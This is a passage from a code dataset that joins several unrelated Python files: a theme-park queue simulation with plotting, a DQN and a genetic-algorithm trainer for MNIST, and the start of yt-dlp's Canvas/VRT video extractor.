agent = Agent(random_seed=self.random_seed)
agent.initialize_agent(
agent_id=agent_id,
behavior_archetype_distribution=behavior_archetype_distribution,
exp_ability=exp_ability,
exp_wait_threshold=exp_wait_threshold,
exp_limit=exp_limit,
attraction_names=[attraction["name"] for attraction in self.attraction_list],
activity_names=[activity["name"] for activity in self.activity_list],
)
self.agents.update({agent_id: agent})
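    # Example of the expected input (hypothetical archetype names; the percentages must sum
    # to 100): behavior_archetype_distribution = {"ride_enthusiast": 60, "relaxer": 40}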
def generate_attractions(self):
""" Initializes attractions """
self.attraction_list = sorted(self.attraction_list, key=lambda k: k['popularity'])
for attraction in self.attraction_list:
self.attractions.update(
{
attraction["name"]: Attraction(attraction_characteristics=attraction)
}
)
def generate_activities(self):
""" Initializes activities """
self.activity_list = sorted(self.activity_list, key=lambda k: k['popularity'])
for activity in self.activity_list:
self.activities.update(
{
activity["name"]: Activity(activity_characteristics=activity, random_seed=self.random_seed)
}
)
def step(self):
""" A minute of time passes, update all agents and attractions. """
# allow new arrivals to enter
total_arrivals = self.schedule[self.time]
for new_arrival_index in range(total_arrivals):
agent_index = self.arrival_index + new_arrival_index
self.agents[agent_index].arrive_at_park(time=self.time)
self.arrival_index += total_arrivals
# get idle agents
idle_agent_ids = self.get_idle_agent_ids()
# get idle activity action
for agent_id in idle_agent_ids:
action, location = self.agents[agent_id].make_state_change_decision(
attractions_dict=self.attractions,
activities_dict=self.activities,
time=self.time,
park_closed=self.park_close<=self.time,
)
if action == "get pass":
self.history["distributed_passes"] += 1
self.update_park_state(
agent=self.agents[agent_id],
action=action,
location=location,
time=self.time,
attractions=self.attractions
)
# process attractions
for attraction_name, attraction in self.attractions.items():
exiting_agents, loaded_agents = attraction.step(time=self.time, park_close=self.park_close)
for agent_id in exiting_agents:
self.agents[agent_id].agent_exited_attraction(name=attraction_name, time=self.time)
for agent_id in loaded_agents:
if self.agents[agent_id].state["current_action"] == "browsing":
# force exit if expedited queue estimate was too high
self.activities[self.agents[agent_id].state["current_location"]].force_exit(agent_id=agent_id)
self.agents[agent_id].agent_exited_activity(
name=self.agents[agent_id].state["current_location"],
time=self.time
)
redeem = self.agents[agent_id].agent_boarded_attraction(name=attraction_name, time=self.time)
if redeem:
self.history["redeemed_passes"] += 1
# process activities
for activity_name, activity in self.activities.items():
exiting_agents = activity.step(time=self.time)
for agent_id in exiting_agents:
self.agents[agent_id].agent_exited_activity(name=activity_name, time=self.time)
# update time counters and history
for agent in self.agents.values():
agent.pass_time()
for attraction in self.attractions.values():
attraction.pass_time()
attraction.store_history(time=self.time)
for activity in self.activities.values():
activity.pass_time()
activity.store_history(time=self.time)
self.calculate_total_active_agents()
if self.verbosity == 1 and self.time % 60 == 0:
self.print_metrics()
if self.verbosity == 2:
self.print_metrics()
self.time += 1
def get_idle_agent_ids(self):
""" Identifies agents within park who have just arrived, who have exited a ride or who have left an activity """
idle_agent_ids = [
agent_id for agent_id, agent_dict in self.agents.items()
if agent_dict.state["within_park"] and agent_dict.state["current_action"] == "idling"
]
return idle_agent_ids
def update_park_state(self, agent, action, location, time, attractions):
""" Updates the agent state, attraction state and activity state based on the action """
if action == "leaving":
if agent.state["expedited_pass"]:
for attraction in agent.state["expedited_pass"]:
self.attractions[attraction].return_pass(agent.agent_id)
agent.return_exp_pass(attraction=attraction)
agent.leave_park(time=time)
if action == "traveling":
if location in self.attractions:
agent.enter_queue(attraction=location, time=time)
self.attractions[location].add_to_queue(agent_id=agent.agent_id)
if location in self.activities:
agent.begin_activity(activity=location, time=time)
self.activities[location].add_to_activity(
agent_id=agent.agent_id,
expedited_return_time=agent.state["expedited_return_time"]
)
if action == "get pass":
agent.get_pass(attraction=location, time=time)
self.attractions[location].remove_pass()
expedited_wait_time = self.attractions[location].add_to_exp_queue(agent_id=agent.agent_id)
agent.assign_expedited_return_time(expedited_wait_time=expedited_wait_time)
def calculate_total_active_agents(self):
""" Counts how many agents are currently active within the park """
active_agents = len([agent_id for agent_id, agent in self.agents.items() if agent.state["within_park"]])
self.history["total_active_agents"].update({self.time: active_agents})
def print_metrics(self):
""" Prints park metrics """
print(f"Time: {self.time}")
print(f"Total Agents in Park: {self.history['total_active_agents'][self.time]}")
print(f"Attraction Wait Times (Minutes):")
for attraction_name, attraction in self.attractions.items():
print(f" {attraction_name}: {attraction.history['queue_wait_time'][self.time]}")
print(f"Activity Visitor (Agents):")
for activity_name, activity in self.activities.items():
print(f" {activity_name}: {activity.history['total_vistors'][self.time]}")
print(f"{'-'*50}\n")
@staticmethod
def make_lineplot(dict_list, x, y, hue, title, location, show=False, y_max=None):
""" Create a hued lineplot derived from a list of dictionaries """
df = pd.DataFrame(dict_list)
l = [time for ind, time in enumerate(list(df['Time'].unique())) if ind%60==0]
plt.figure(figsize=(15,8))
ax = sns.lineplot(data=df, x=x, y=y, hue=hue)
ax.set(xticks=l, xticklabels=l, title=title)
ax.tick_params(axis='x', rotation=45)
if y_max:
ax.set(ylim=(0, y_max))
plt.savefig(location, transparent=False, facecolor="white", bbox_inches="tight")
plt.savefig(f"{location} Transparent", transparent=True, bbox_inches="tight")
plt.show()
if not show:
plt.close()
@staticmethod
def make_histogram(dict_list, x, title, location, show=False):
""" Create a histogram derived from a list of dictionaries """
df = pd.DataFrame(dict_list)
l = sorted(list(set(val for val in df[x])))
plt.figure(figsize=(15,8))
ax = sns.histplot(data=df, x=x, stat="percent", bins=np.arange(-0.5, len(l))) # weird trick to align labels
ax.set(title=title, xticks=l, xticklabels=l)
plt.savefig(location, transparent=False, facecolor="white", bbox_inches="tight")
plt.savefig(f"{location} Transparent", transparent=True, bbox_inches="tight")
plt.show()
if show:
disp_df = pd.DataFrame(df[x].describe()).reset_index()
disp_df.columns = ["Metric", x]
print(
tabulate(
disp_df,
headers='keys',
tablefmt='psql',
showindex=False,
floatfmt=('.2f')
)
)
if not show:
plt.close()
@staticmethod
def make_barplot(dict_list, x, y, hue, y_max, title, location, estimator=None, show=False):
""" Create a hued barplot derived from a list of dictionaries """
df = pd.DataFrame(dict_list)
plt.figure(figsize=(15,8))
if estimator:
ax = sns.barplot(data=df, x=x, y=y, hue=hue, ci=None, estimator=estimator)
else:
ax = sns.barplot(data=df, x=x, y=y, hue=hue)
ax.set(title=title)
if y_max:
ax.set(ylim=(0, y_max))
plt.savefig(location, transparent=False, facecolor="white", bbox_inches="tight")
plt.savefig(f"{location} Transparent", transparent=True, bbox_inches="tight")
plt.show()
if show and not estimator:
print(
tabulate(
df.sort_values(hue),
headers='keys',
tablefmt='psql',
showindex=False,
floatfmt=('.2f')
)
)
if show and estimator==sum:
print(
tabulate(
df.groupby(x).sum().reset_index(),
headers='keys',
tablefmt='psql',
showindex=False,
)
)
if not show:
plt.close()
def make_plots(self, show=False):
""" Plots key park information, save to version folder """
version_path = os.path.join(f"{self.version}")
if not os.path.exists(version_path):
os.mkdir(version_path)
# Attractions
queue_length = []
queue_wait_time = []
exp_queue_length = []
exp_queue_wait_time = []
for attraction_name, attraction in self.attractions.items():
for time, val in attraction.history["queue_length"].items():
queue_length.append({"Time": time, "Agents": val, "Attraction": attraction_name})
for time, val in attraction.history["queue_wait_time"].items():
queue_wait_time.append({"Time": time, "Minutes": val, "Attraction": attraction_name})
for time, val in attraction.history["exp_queue_length"].items():
exp_queue_length.append({"Time": time, "Agents": val, "Attraction": attraction_name})
for time, val in attraction.history["exp_queue_wait_time"].items():
exp_queue_wait_time.append({"Time": time, "Minutes": val, "Attraction": attraction_name})
avg_queue_wait_time = []
for attraction_name, attraction in self.attractions.items():
queue_wait_list = [
val for time, val in attraction.history["queue_wait_time"].items()
if time <= self.park_close
]
exp_queue_wait_list = [
val for time, val in attraction.history["exp_queue_wait_time"].items()
if time <= self.park_close
]
avg_queue_wait_time.append(
{
"Attraction": attraction_name,
"Average Wait Time": sum(queue_wait_list)/len(queue_wait_list),
"Queue Type": "Standby"
}
)
avg_queue_wait_time.append(
{
"Attraction": attraction_name,
"Average Wait Time": sum(exp_queue_wait_list)/len(exp_queue_wait_list),
"Queue Type": "Expedited"
}
)
# Activities
total_vistors = []
for activity_name, activity in self.activities.items():
for time, val in activity.history["total_vistors"].items():
total_vistors.append({"Time": time, "Agents": val, "Activity": activity_name})
# Agent Distribution
broad_agent_distribution = []
for time, total_agents in self.history["total_active_agents"].items():
broad_agent_distribution.append(
{
"Time": time,
"Approximate Percent": sum(
[attraction.history["queue_length"][time] for attraction in self.attractions.values()]
)/total_agents if total_agents > 0 else 0,
"Type": "Attractions"
}
)
broad_agent_distribution.append(
{
"Time": time,
"Approximate Percent": sum(
[activity.history["total_vistors"][time] for activity in self.activities.values()]
)/total_agents if total_agents > 0 else 0,
"Type": "Activities"
}
)
specific_agent_distribution = []
for time, total_agents in self.history["total_active_agents"].items():
for attraction_name, attraction in self.attractions.items():
specific_agent_distribution.append(
{
"Time": time,
"Approximate Percent": attraction.history["queue_length"][time]/total_agents if total_agents > 0 else 0,
"Type": attraction_name
}
)
for activity_name, activity in self.activities.items():
specific_agent_distribution.append(
{
"Time": time,
"Approximate Percent": activity.history["total_vistors"][time]/total_agents if total_agents > 0 else 0,
"Type": activity_name
}
)
attraction_counter = []
attraction_density = []
for agent_id, agent in self.agents.items():
attraction_counter.append(
{
"Agent": agent_id,
"Behavior": agent.behavior["archetype"],
"Total Attractions Visited": sum(
attraction['times_completed'] for attraction in agent.state["attractions"].values()
)
}
)
for attraction, attraction_dict in agent.state["attractions"].items():
attraction_density.append(
{
"Attraction": attraction,
"Visits": attraction_dict["times_completed"]
}
)
self.make_lineplot(
dict_list=queue_length,
x="Time",
y="Agents",
hue="Attraction",
y_max=self.plot_range["Attraction Queue Length"],
title="Attraction Queue Length",
location=f"{self.version}/Attraction Queue Length",
show=show,
)
self.make_lineplot(
dict_list=queue_wait_time,
x="Time",
y="Minutes",
hue="Attraction",
y_max=self.plot_range["Attraction Wait Time"],
title="Attraction Wait Time",
location=f"{self.version}/Attraction Wait Time",
show=show,
)
self.make_lineplot(
dict_list=exp_queue_length,
x="Time",
y="Agents",
hue="Attraction",
y_max=self.plot_range["Attraction Expedited Queue Length"],
title="Attraction Expedited Queue Length",
location=f"{self.version}/Attraction Expedited Queue Length",
show=show,
)
self.make_lineplot(
dict_list=exp_queue_wait_time,
x="Time",
y="Minutes",
hue="Attraction",
y_max=self.plot_range["Attraction Expedited Wait Time"],
title="Attraction Expedited Wait Time",
location=f"{self.version}/Attraction Expedited Wait Time",
show=show,
)
self.make_lineplot(
dict_list=total_vistors,
x="Time",
y="Agents",
hue="Activity",
y_max=self.plot_range["Activity Vistors"],
title="Activity Vistors",
location=f"{self.version}/Activity Vistors",
show=show,
)
self.make_lineplot(
dict_list=broad_agent_distribution,
x="Time",
y="Approximate Percent",
hue="Type",
y_max=self.plot_range["Approximate Agent Distribution (General)"],
title="Approximate Agent Distribution (General)",
location=f"{self.version}/Approximate Agent Distribution (General)",
show=show,
)
self.make_lineplot(
dict_list=specific_agent_distribution,
x="Time",
y="Approximate Percent",
hue="Type",
y_max=self.plot_range["Approximate Agent Distribution (Specific)"],
title="Approximate Agent Distribution (Specific)",
location=f"{self.version}/Approximate Agent Distribution (Specific)",
show=show,
)
self.make_barplot(
dict_list=avg_queue_wait_time,
x="Attraction",
y="Average Wait Time",
hue="Queue Type",
y_max=self.plot_range["Attraction Average Wait Times"],
title="Attraction Average Wait Times",
location=f"{self.version}/Attraction Average Wait Times",
show=show
)
self.make_histogram(
dict_list=attraction_counter,
x="Total Attractions Visited",
title="Agent Attractions Histogram",
location=f"{self.version}/Agent Attractions Histogram",
show=show,
)
self.make_barplot(
dict_list=attraction_density,
x="Attraction",
y="Visits",
hue=None,
y_max=self.plot_range["Attraction Total Visits"],
estimator=sum,
title="Attraction Total Visits",
location=f"{self.version}/Attraction Total Visits",
show=show
)
self.make_barplot(
dict_list= [
{
"Expedited Passes": " ",
"Total Passes": self.history["distributed_passes"],
"Type": "Distributed"
},
{
"Expedited Passes": " ",
"Total Passes": self.history["redeemed_passes"],
"Type": "Redeemed"
}
],
x="Expedited Passes",
y="Total Passes",
hue="Type",
y_max=self.plot_range["Expedited Pass Distribution"],
title="Expedited Pass Distribution",
location=f"{self.version}/Expedited Pass Distribution",
show=show
)
self.make_barplot(
dict_list= [
{
"Age Class": " ",
"Agents": len([agent_id for agent_id, agent in self.agents.items() if agent.state["age_class"] == "no_child_rides"]),
"Type": "No Child Rides"
},
{
"Age Class": " ",
"Agents": len([agent_id for agent_id, agent in self.agents.items() if agent.state["age_class"] == "no_adult_rides"]),
"Type": "No Adult Rides"
},
{
"Age Class": " ",
"Agents": len([agent_id for agent_id, agent in self.agents.items() if agent.state["age_class"] == "no_preference"]),
"Type": "No Preference"
},
],
x="Age Class",
y="Agents",
hue="Type",
y_max=self.plot_range["Age Class Distribution"],
title="Age Class Distribution",
location=f"{self.version}/Age Class Distribution",
show=show
)
def print_logs(self, N=None, selected_agent_ids=None):
""" Prints the logs of random agents or a list of agents """
if N:
all_agent_ids = list(self.agents.keys())
random.seed(self.random_seed)
selected_agent_ids = random.sample(all_agent_ids, N)
for agent_id in selected_agent_ids:
print(f"Agent ID: {agent_id}")
print(f"Agent Archetype: {self.agents[agent_id].behavior['archetype']}")
print(f"{self.agents[agent_id].log}\n")
@staticmethod
def write_data_to_file(data, output_file_path, output_file_format):
""" Takes a data object, writes and saves as a pickle or json. """
full_path = output_file_path + "." + output_file_format
if isinstance(full_path, str):
if output_file_format not in {"json"}:
raise ValueError(f"Incompatible file format :{output_file_format}")
# Create folder if not already present
folder = os.path.dirname(full_path)
if folder and not os.path.exists(folder):
os.makedirs(folder)
mode = "wt"
file_writer = open(full_path, mode)
else:
raise ValueError("full_path must be specified")
writers = {
"json": lambda file_writer: json.dump(data, file_writer, indent=2),
}
writers[output_file_format](file_writer)
file_writer.close()
``` |
{
"source": "JHWen/mnist_tensorflow",
"score": 3
} |
#### File: JHWen/mnist_tensorflow/dqn_mnist.py
```python
from keras.layers import *
from keras.models import Model
# from keras.utils.vis_utils import plot_model
from keras.utils import np_utils
import keras
import keras.backend as K
import numpy as np
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
# from IPython.display import Image
from tqdm import tqdm
from collections import deque
# import seaborn as sns
import random
import time
class MnEnviroment(object):
def __init__(self, x, y):
self.train_X = x
self.train_Y = y
self.current_index = self._sample_index()
self.action_space = len(set(y)) - 1
def reset(self):
obs, _ = self.step(-1)
return obs
'''
    action: 0-9 category, -1: start and no reward
return: next_state(image), reward
'''
def step(self, action):
if action == -1:
_c_index = self.current_index
self.current_index = self._sample_index()
return self.train_X[_c_index], 0
r = self.reward(action)
self.current_index = self._sample_index()
return self.train_X[self.current_index], r
def reward(self, action):
c = self.train_Y[self.current_index]
# print(c)
return 1 if c == action else -1
def sample_actions(self):
return random.randint(0, self.action_space)
def _sample_index(self):
return random.randint(0, len(self.train_Y) - 1)
def createDQN(input_width, input_height, actions_num):
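    # Q-network: four conv layers -> dense(128) -> one Q-value per action; a one-hot
    # action input masks the Q-vector so the model outputs Q(s, a) for the chosen action.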
img_input = Input(shape=(input_width, input_height, 1), dtype='float32', name='image_inputs')
# conv1
conv1 = Conv2D(32, 3, padding='same', activation='relu', kernel_initializer='he_normal')(img_input)
conv2 = Conv2D(64, 3, strides=2, padding='same', activation='relu', kernel_initializer='he_normal')(conv1)
conv3 = Conv2D(64, 3, strides=2, padding='same', activation='relu', kernel_initializer='he_normal')(conv2)
conv4 = Conv2D(128, 3, strides=2, padding='same', activation='relu', kernel_initializer='he_normal')(conv3)
x = Flatten()(conv4)
x = Dense(128, activation='relu')(x)
outputs_q = Dense(actions_num, name='q_outputs')(x)
# one hot input
actions_input = Input((actions_num,), name='actions_input')
q_value = multiply([actions_input, outputs_q])
q_value = Lambda(lambda l: K.sum(l, axis=1, keepdims=True), name='q_value')(q_value)
model = Model(inputs=[img_input, actions_input], outputs=q_value)
model.compile(loss='mse', optimizer='adam')
return model
def copy_critic_to_actor():
critic_weights = critic_model.get_weights()
    actor_weights = actor_model.get_weights()
    for i in range(len(critic_weights)):
        actor_weights[i] = critic_weights[i]
    actor_model.set_weights(actor_weights)
def get_q_values(model_, state):
inputs_ = [state.reshape(1, *state.shape), dummy_actions]
qvalues = model_.predict(inputs_)
return qvalues[0]
def predict(model, states):
inputs_ = [states, np.ones(shape=(len(states), num_actions))]
qvalues = model.predict(inputs_)
return np.argmax(qvalues, axis=1)
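# Linear epsilon annealing from ep_max down to ep_min over esp_total steps (ep_decay is accepted but unused).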
def epsilon_calc(step, ep_min=0.01, ep_max=1, ep_decay=0.0001, esp_total=1000):
return max(ep_min, ep_max - (ep_max - ep_min) * step / esp_total)
def epsilon_greedy(env, state, step, ep_min=0.01, ep_decay=0.0001, ep_total=1000):
epsilon = epsilon_calc(step, ep_min, 1, ep_decay, ep_total)
if np.random.rand() < epsilon:
return env.sample_actions(), 0
qvalues = get_q_values(actor_q_model, state)
return np.argmax(qvalues), np.max(qvalues)
def pre_remember(pre_go=30):
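    # Seed the replay memory with a few random transitions before training starts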
state = env.reset()
for i in range(pre_go):
rd_action = env.sample_actions()
next_state, reward = env.step(rd_action)
remember(state, rd_action, 0, reward, next_state)
state = next_state
def remember(state, action, action_q, reward, next_state):
memory.append([state, action, action_q, reward, next_state])
def sample_ram(sample_num):
return np.array(random.sample(memory, sample_num))
def replay():
if len(memory) < replay_size:
return
    # Sample i.i.d. from the replay memory
    samples = sample_ram(replay_size)
    # Unpack the relevant fields from every sample
    # next_states is unused here because each state is independent of the previous one.
states, actions, old_q, rewards, next_states = zip(*samples)
states, actions, old_q, rewards = np.array(states), np.array(actions).reshape(-1, 1), \
np.array(old_q).reshape(-1, 1), np.array(rewards).reshape(-1, 1)
actions_one_hot = np_utils.to_categorical(actions, num_actions)
# print(states.shape,actions.shape,old_q.shape,rewards.shape,actions_one_hot.shape)
    # Getting the next-state Q estimate from the actor is also unused here, since gamma=0, i.e. the Bellman equation is not expanded
# inputs_ = [next_states,np.ones((replay_size,num_actions))]
# qvalues = actor_q_model.predict(inputs_)
# q = np.max(qvalues,axis=1,keepdims=True)
q = 0
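    # With gamma = 0 this reduces to a soft update of Q toward the immediate reward (moving average with rate alpha)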
q_estimate = (1 - alpha) * old_q + alpha * (rewards.reshape(-1, 1) + gamma * q)
history = critic_model.fit([states, actions_one_hot], q_estimate, epochs=1, verbose=0)
return np.mean(history.history['loss'])
if __name__ == '__main__':
# parameters
memory = deque(maxlen=512)
replay_size = 64
epoches = 2000
pre_train_num = 256
gamma = 0. # every state is i.i.d
alpha = 0.5
forward = 512
    epsilon_total = 2018
# load mnist dataset
# X : 0-255, Y :0-9
f = np.load('./data/mnist.npz')
X_train, y_train = f['x_train'], f['y_train']
X_test, y_test = f['x_test'], f['y_test']
num_actions = len(set(y_test))
image_w, image_h = X_train.shape[1:]
print(y_test[0])
# nums*28*28*1
X_train = X_train.reshape(*X_train.shape, 1)
X_test = X_test.reshape(*X_test.shape, 1)
print(len(X_train))
print(len(X_test))
# normalization
X_train = X_train / 255.
X_test = X_test / 255.
dummy_actions = np.ones((1, num_actions))
# y_train_onehot = keras.utils.to_categorical(y_train, num_actions)
# y_test_onehot = keras.utils.to_categorical(y_test, num_actions)
# plt.imshow(X_train[0].reshape(28, 28), 'gray')
# plt.show()
# start code
env = MnEnviroment(X_train, y_train)
    # init models
    actor_model = createDQN(image_w, image_h, num_actions)  # used for action selection
    critic_model = createDQN(image_w, image_h, num_actions)  # used for training
actor_q_model = Model(inputs=actor_model.input, outputs=actor_model.get_layer('q_outputs').output)
memory.clear()
total_rewards = 0
reward_rec = []
pre_remember(pre_train_num)
every_copy_step = 128
pbar = tqdm(range(1, epoches + 1))
state = env.reset()
for epoch in pbar:
total_rewards = 0
epo_start = time.time()
for step in range(forward):
            # Choose an action for the current state with epsilon_greedy
            action, q = epsilon_greedy(env, state, epoch, ep_min=0.01, ep_total=epsilon_total)
            eps = epsilon_calc(epoch, esp_total=epsilon_total)
# play
next_state, reward = env.step(action)
            # Add the transition to the experience replay memory
            remember(state, action, q, reward, next_state)
            # Replay a batch sampled from memory to keep training data i.i.d. (not strictly necessary for this task).
loss = replay()
total_rewards += reward
state = next_state
if step % every_copy_step == 0:
copy_critic_to_actor()
reward_rec.append(total_rewards)
pbar.set_description(
'R:{} L:{:.4f} T:{} P:{:.3f}'.format(total_rewards, loss, int(time.time() - epo_start), eps))
critic_model.save('./model_path/critic_2000.HDF5')
r5 = np.mean([reward_rec[i:i + 10] for i in range(0, len(reward_rec), 10)], axis=1)
plt.plot(range(len(r5)), r5, c='b')
plt.xlabel('iters')
plt.ylabel('mean score')
plt.show()
copy_critic_to_actor()
    model_loaded = keras.models.load_model('./model_path/critic_2000.HDF5')
pred = predict(actor_q_model, X_test)
accuracy_score(y_test, pred)
```
#### File: JHWen/mnist_tensorflow/mlp_ga.py
```python
import time
import threading
import math
import random
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.examples.tutorials.mnist import input_data
import numpy as np
INPUT_DIMENSIONS = [28, 28, 1]
# Hyper params
BATCH_SIZE = 200
NUM_GENERATIONS = 100
MUTATION_POWER = 0.005
POP_SIZE = 500
NUM_SELECTED_IND = 10
# Display log messages after every LOG_FREQUENCY iterations during training
LOG_FREQUENCY = 1
# Some MLP networks - can be replaced with deeper MLPs or Covnets
def inference_1_layer_mlp(tp_input, reuse=False):
"""
Construct the neural network with just 1 layer
:tp_input: input placeholder
:return: output logits' expression
"""
with tf.variable_scope('mnist_es', reuse=reuse):
te_net = slim.fully_connected(tp_input, 10, activation_fn=None, reuse=reuse, scope='layer1')
return te_net
def inference_2_layer_mlp(tp_input, reuse=False):
"""
Construct the neural network with just 2 layers
:tp_input: input placeholder
:return: output logits' expression
"""
with tf.variable_scope('mnist_es', reuse=reuse):
te_net = slim.fully_connected(tp_input, 128, activation_fn=tf.nn.selu, reuse=reuse, scope='layer1')
te_net = slim.fully_connected(te_net, 10, activation_fn=None, reuse=reuse, scope='layer2')
return te_net
def reward(te_inference, tp_labels):
"""
Reward for the current inference, negative of the traditional loss
:te_inference: expression for logits
:tp_labels: placeholder for true labels
:return: reward expression
"""
return -tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=tp_labels, logits=te_inference))
def accuracy(te_inference, tp_labels):
"""
Construct accuracy expression
:te_inference: expression for logits
:tp_labels: true label placeholder
:return: accuracy expression
"""
te_correct_prediction = tf.equal(tf.argmax(te_inference, 1), tf.argmax(tp_labels, 1))
return tf.reduce_mean(tf.cast(te_correct_prediction, tf.float32))
def placeholders():
"""
Creates placeholders for inputs and labels
"""
tp_input = tf.placeholder(tf.float32, shape=[None, INPUT_DIMENSIONS[0] * INPUT_DIMENSIONS[1]])
tp_label = tf.placeholder(tf.float32, shape=[None, 10])
return tp_input, tp_label
def iterate_minibatches(input_set, target_set, batch_size, shuffle=False):
"""
Generator to yield minibatches for a training set
:input_set: input feature set
:target_set: target labels for the features
:batch_size: batch size for minibatch
:shuffle: shuffle the data
"""
if shuffle:
indices = np.arange(len(input_set))
np.random.shuffle(indices)
for start_idx in range(0, len(input_set) - batch_size + 1, batch_size):
if shuffle:
excerpt = indices[start_idx:start_idx + batch_size]
else:
excerpt = slice(start_idx, start_idx + batch_size)
yield input_set[excerpt], target_set[excerpt]
def train(num_generations, mutation_power, pop_size, num_selected_ind, resume=False):
"""
Train the neural network using a simple genetic algorithm
:num_generations: number of generations in GA
:mutation_power: std dev of perturbations
:pop_size: number of members in each population
:num_selected_ind: number of selected individuals from the population
:resume: load a saved model and resume from there
"""
def normalize_weights(w):
"""
Normalize weights - a good initialization for GAs
"""
w *= 1.0 / np.sqrt(np.square(w).sum(axis=0, keepdims=True))
return w
def create_feed_dict(x, t, params):
"""
Utility for creating feed dictionary
"""
f_dict = {tp_input: x, tp_labels: t}
for te_l_p, param in zip(te_layer_params, params):
f_dict[te_l_p] = param
return f_dict
# load dataset
dataset = input_data.read_data_sets('MNIST_data', one_hot=True)
# for now just work on subset of original dataset
train_images = dataset.train.images[:2000]
train_labels = dataset.train.labels[:2000]
with tf.Graph().as_default():
# create the network and reward, accuracy expressions
tp_input, tp_labels = placeholders()
te_inference = inference_2_layer_mlp(tp_input)
te_reward = reward(te_inference, tp_labels)
te_accuracy = accuracy(te_inference, tp_labels)
# initialize all parameters
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
# logging
summary_writer = tf.summary.FileWriter('./summaries_ga', sess.graph)
saver = tf.train.Saver()
# create initial param vector
        te_layer_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='mnist_es')  # must match the variable_scope used in the inference networks
params = [[] for _ in range(pop_size)]
fitness = np.zeros((pop_size,))
if resume:
params = np.load("./saved_models/mnist_ga_params.npy")
else:
for i in range(pop_size):
# initialize the individual
for te_p in te_layer_params:
# for weights do initialization with normal distribution
if "biases" not in te_p.name:
params[i].append(
normalize_weights(sess.run(tf.random_normal(te_p.shape, stddev=mutation_power))))
# for biases, initialize with zeros
else:
params[i].append(sess.run(te_p))
# evaluate it's fitness
for batch in iterate_minibatches(train_images, train_labels, BATCH_SIZE, shuffle=True):
fitness[i] += sess.run(te_reward, feed_dict=create_feed_dict(batch[0], batch[1], params[i]))
# simple genetic algorithm
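        # Each generation: rank by fitness, carry the elite over unchanged, and refill the
        # population with Gaussian-perturbed copies of the top num_selected_ind individuals (truncation selection)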
for g in range(num_generations):
# sort params by fitness
param_index_sorted = [x for (y, x) in
sorted(zip(fitness, range(pop_size)), key=lambda pair: pair[0], reverse=True)]
# initialize next gen params and fitness as 0
next_gen_params = [[] for _ in range(pop_size + 1)]
next_gen_fitness = np.zeros((pop_size + 1,))
# include elite of previous generation as 1st member of new population
next_gen_params[0] = params[param_index_sorted[0]]
next_gen_fitness[0] = fitness[param_index_sorted[0]]
# do logging
if g % LOG_FREQUENCY == 0:
print(fitness.shape)
summary_writer.add_summary(tf.Summary(value=[
tf.Summary.Value(tag="F-0", simple_value=fitness[param_index_sorted[0]]),
]), g)
summary_writer.add_summary(tf.Summary(value=[
tf.Summary.Value(tag="F-1", simple_value=fitness[param_index_sorted[1]]),
]), g)
summary_writer.add_summary(tf.Summary(value=[
tf.Summary.Value(tag="F-2", simple_value=fitness[param_index_sorted[2]]),
]), g)
# for each member of new pop, select a new member as the perturbed variant of top "num_select_ind"
# members of previous pop
for i in range(pop_size):
selected_index = param_index_sorted[random.randint(0, num_selected_ind - 1)]
next_gen_params[i + 1] = params[selected_index]
for next_gen_param_idx in range(len(next_gen_params[i + 1])):
next_gen_params[i + 1][next_gen_param_idx] = next_gen_params[i + 1][
next_gen_param_idx] + mutation_power * np.random.normal(
0, 1, next_gen_params[i + 1][next_gen_param_idx].shape)
for batch in iterate_minibatches(train_images, train_labels, BATCH_SIZE, shuffle=True):
next_gen_fitness[i + 1] += sess.run(te_reward, feed_dict=create_feed_dict(batch[0], batch[1],
next_gen_params[i + 1]))
# set next iterations params and fitness
params = next_gen_params
fitness = next_gen_fitness
if __name__ == '__main__':
train(NUM_GENERATIONS, MUTATION_POWER, POP_SIZE, NUM_SELECTED_IND)
``` |
{
"source": "jhwgh1968/yt-dlp",
"score": 2
} |
#### File: yt_dlp/extractor/canvas.py
```python
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from .gigya import GigyaBaseIE
from ..compat import compat_HTTPError
from ..utils import (
ExtractorError,
clean_html,
extract_attributes,
float_or_none,
get_element_by_class,
int_or_none,
merge_dicts,
str_or_none,
strip_or_none,
url_or_none,
urlencode_postdata
)
class CanvasIE(InfoExtractor):
_VALID_URL = r'https?://mediazone\.vrt\.be/api/v1/(?P<site_id>canvas|een|ketnet|vrt(?:video|nieuws)|sporza|dako)/assets/(?P<id>[^/?#&]+)'
_TESTS = [{
'url': 'https://mediazone.vrt.be/api/v1/ketnet/assets/md-ast-4ac54990-ce66-4d00-a8ca-9eac86f4c475',
'md5': '37b2b7bb9b3dcaa05b67058dc3a714a9',
'info_dict': {
'id': 'md-ast-4ac54990-ce66-4d00-a8ca-9eac86f4c475',
'display_id': 'md-ast-4ac54990-ce66-4d00-a8ca-9eac86f4c475',
'ext': 'mp4',
'title': 'Nachtwacht: De Greystook',
'description': 'Nachtwacht: De Greystook',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 1468.02,
},
'expected_warnings': ['is not a supported codec'],
}, {
'url': 'https://mediazone.vrt.be/api/v1/canvas/assets/mz-ast-5e5f90b6-2d72-4c40-82c2-e134f884e93e',
'only_matching': True,
}]
_GEO_BYPASS = False
_HLS_ENTRY_PROTOCOLS_MAP = {
'HLS': 'm3u8_native',
'HLS_AES': 'm3u8',
}
_REST_API_BASE = 'https://media-services-public.vrt.be/vualto-video-aggregator-web/rest/external/v1'
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
site_id, video_id = mobj.group('site_id'), mobj.group('id')
data = None
if site_id != 'vrtvideo':
# Old API endpoint, serves more formats but may fail for some videos
data = self._download_json(
'https://mediazone.vrt.be/api/v1/%s/assets/%s'
% (site_id, video_id), video_id, 'Downloading asset JSON',
'Unable to download asset JSON', fatal=False)
# New API endpoint
if not data:
headers = self.geo_verification_headers()
headers.update({'Content-Type': 'application/json'})
token = self._download_json(
'%s/tokens' % self._REST_API_BASE, video_id,
'Downloading token', data=b'', headers=headers)['vrtPlayerToken']
data = self._download_json(
'%s/videos/%s' % (self._REST_API_BASE, video_id),
video_id, 'Downloading video JSON', query={
'vrtPlayerToken': token,
'client': '%s@PROD' % site_id,
}, expected_status=400)
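        # Even an HTTP 400 response carries a JSON body with an error code, which is inspected below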
if not data.get('title'):
code = data.get('code')
if code == 'AUTHENTICATION_REQUIRED':
self.raise_login_required()
